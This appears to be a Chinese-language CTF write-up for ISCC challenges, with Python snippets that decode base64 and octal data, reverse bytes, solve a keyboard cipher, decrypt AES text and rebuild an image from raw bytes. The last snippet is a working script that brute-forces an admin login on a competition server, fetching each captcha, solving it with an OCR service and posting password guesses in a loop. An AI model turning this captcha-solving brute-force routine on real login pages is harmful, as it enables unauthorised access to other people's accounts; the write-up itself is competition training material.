filename = "message.txt" with open(filename) as f: txt = f.read().split(" ") #print txt s = "" for i in txt: if i: s += chr(int(i,8)) flag = base64.b64decode(s) print flag
filename = "2" with open(filename,"rb") as f: s = f.read()
s = s[:9] flag = s[::-1] print flag
flag:9102_cCsI
知识点:LSB隐写
Keyes’ secret
1
tip:Trying to figure out Keyes' secret
打开文件发现都是大写英文字母,有点像键盘密码,于是进行替换
1 2 3 4
RFVGYHN -> h WSXCDE -> e WSXCV -> l TGBNMJUY - o
得到hello,说明想法是对的,最后得到一段话,flag要转为大写
1
hello,in computer security, capture the flag (ctf), a type of cryptosport, is a computer security competition. ctf contests are usually desluned to serve as an educational exercise to give participants experience in securing a machine, as well as conducting and reacting to the sort of attacks found in the real world (i.e., bug bounty programs in professional settings). here are your FLAG{ISCC KEYBOARD CIPHER} reverse-engineering, network sniffing, protocol analysis, system administration, programming, and cryptanalysis are all skills which have been required by prior ctf contests at def con.
key = "ISCC" #print len(key) c = "U2FsdGVkX19QwGkcgD0fTjZxgijRzQOGbCWALh4sRDec2w6xsY/ux53Vuj/AMZBDJ87qyZL5kAf1fmAH4Oe13Iu435bfRBuZgHpnRjTBn5+xsDHONiR3t0+Oa8yG/tOKJMNUauedvMyN4v4QKiFunw==" m = decrypt(c,key) m = decrypt(m,key) print m
filename = "1.jpg" with open(filename,"rb") as f: jpg = f.read()
print type(ord(jpg[0])) im = Image.new("RGB",(x,y)) #index = 0 for i in range(x): for j in range(y): rgb = ord(jpg[j*25 + i]) im.putpixel((i,j),(rgb,rgb,rgb))
""" 读取图片 """ defget_file_content(filePath): with open(filePath, 'rb') as fp: return fp.read() defgetvcode(session): url = "http://39.100.83.188:8002/vcode.php" vcode = session.get(url) with open("1.png","wb+") as f: f.write(vcode.content)
image = get_file_content('1.png') a = client.basicGeneral(image); try: a = a["words_result"][0]["words"] if len(a) == 4: return a return getvcode(session) except: return getvcode(session)
defbruteForce(session,passwd): url = "http://39.100.83.188:8002/login.php" data = {} data["username"] = "admin" data["pwd"] = str(passwd) data["user_code"] = getvcode(session) data["Login"] = "submit" #print data res = session.post(url,data = data) return res.content
sess = requests.session() # for i in range(100,1000): result = bruteForce(sess,i) while("验证码"in result): result = bruteForce(sess,i) print"%d:"%i ,result